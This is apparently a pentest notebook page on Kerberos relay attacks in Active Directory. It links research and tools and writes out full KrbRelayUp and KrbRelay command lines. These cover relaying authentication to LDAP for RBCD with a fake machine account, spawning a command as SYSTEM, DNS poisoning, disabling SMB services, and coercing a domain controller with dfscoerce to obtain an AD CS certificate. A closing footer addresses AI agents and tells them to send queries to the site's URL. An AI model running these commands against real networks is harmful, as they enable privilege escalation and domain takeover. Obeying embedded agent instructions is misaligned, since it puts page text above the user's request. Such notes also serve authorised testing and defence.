# Kerberos Relay

* <https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html>
* <https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html>
* <https://decoder.cloud/2025/04/24/from-ntlm-relay-to-kerberos-relay-everything-you-need-to-know/>

## mitm6 + Kerberos DNS Relay + AD CS ESC8

* <https://dirkjanm.io/relaying-kerberos-over-dns-with-krbrelayx-and-mitm6/>

### CNAME Abuse

* <https://cymulate.com/blog/kerberos-authentication-relay-via-cname-abuse/>

## Tools

### KrbRelay

* <https://github.com/cube0x0/KrbRelay>
* <https://gist.github.com/tothi/bf6c59d6de5d0c9710f23dae5750c4b9>
* <https://icyguider.github.io/2022/05/19/NoFix-LPE-Using-KrbRelay-With-Shadow-Credentials.html>

### KrbRelayUp

* <https://github.com/Dec0ne/KrbRelayUp>
* <https://www.microsoft.com/security/blog/2022/05/25/detecting-and-preventing-privilege-escalation-attacks-leveraging-kerberos-relaying-krbrelayup/>
* <https://github.com/BronzeBee/DavRelayUp>
* <https://github.com/Dec0ne/DavRelayUp>

#### RELAY

Relay authentication to LDAP(S) with automatic machine creation and configure RBCD:

```
PS > .\KrbRelayUp.exe RELAY [-d|--Domain megacorp.local] [-dc|--DomainController DC01.megacorp.local] [-m|--Method RBCD] -c|--CreateNewComputerAccount [-cn|--ComputerName FAKEMACHINE$] [-cp|--ComputerPassword Passw0rd!]
```

Perform RBCD with UPNs:

```
PS > .\KrbRelayUp.exe RELAY -u2u -cn j.doe -cp Passw0rd!
```

{% content-ref url="/pages/hEqPC8druXtA7lMGmGf6#rbcd-with-upns" %}
[Resource-based Constrained](/pentest/infrastructure/ad/kerberos/delegation-abuse/rbcd.md#rbcd-with-upns)
{% endcontent-ref %}

#### SPAWN

Execute a command as NT AUTHORITY\SYSTEM via RBCD abuse:

```
PS > .\KrbRelayUp.exe SPAWN [-m|--Method RBCD] [-i|--Impersonate administrator] [-s|ServiceName PwnSVC] [-sc|--ServiceCommand C:\Windows\System32\cmd.exe] -cn|--ComputerName FAKEMACHINE$ -cp|--ComputerPassword Passw0rd! [or -ch|--ComputerPasswordHash fc525c9683e8fe067095ba2ddc971889]
```

{% hint style="warning" %}
As [@ShitSecure](https://twitter.com/ShitSecure) mentioned, executing the binary as a .NET Reflective Assembly from PowerShell will fail because the PowerShell process will have already initialized the security parameters for COM itself after having been launched, so `CoInitializeSecurity` will not contain those new parameters attempted to set by KrbRelay(Up).
{% endhint %}

### RemoteKrbRelay

* <https://habr.com/ru/articles/848542/>
* <https://github.com/CICADA8-Research/RemoteKrbRelay>
* <https://github.com/rtecCyberSec/RemoteKrbRelay/tree/ntlm>
* <https://github.com/OleFredrik1/remoteKrbRelayx>

### KrbRelay-SMBServer

* <https://www.tiraniddo.dev/2024/04/relaying-kerberos-authentication-from.html>
* <https://github.com/decoder-it/KrbRelay-SMBServer>
* <https://www.synacktiv.com/publications/relaying-kerberos-over-smb-using-krbrelayx>
* <https://www.synacktiv.com/publications/abusing-multicast-poisoning-for-pre-authenticated-kerberos-relay-over-http-with>

Stop/start services with Cmd:

```
Cmd > sc config LanmanServer start= disabled & sc stop LanmanServer & sc stop srv2 & sc stop srvnet
Cmd > sc config LanmanServer start= auto & sc start LanmanServer & sc start srv2 & sc start srvnet
```

Stop/start services with PowerShell and attack:

```
PS > Invoke-DNSUpdate -DNSName adcs1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -DNSData 10.10.13.37
PS > Set-Service -Name LanmanServer -StartupType Disabled; Stop-Service -Name LanmanServer -Force; Stop-Service -Name srv2 -Force; Stop-Service -Name srvnet -Force
PS > .\KrbRelay.exe -spn HTTP/ADCS.megacorp.local -redirecthost adcs1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -endpoint certsrv -adcs DomainController -listenerport 445
$ dfscoerce.py -d megacorp.local -u snovvcrash -k -no-pass adcs1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA DC01.megacorp.local
PS > Set-Service -Name LanmanServer -StartupType Automatic; Start-Service -Name LanmanServer; Start-Service -Name srv2; Start-Service -Name srvnet
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ppn.snovvcra.sh/pentest/infrastructure/ad/kerberos/kerberos-relay.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.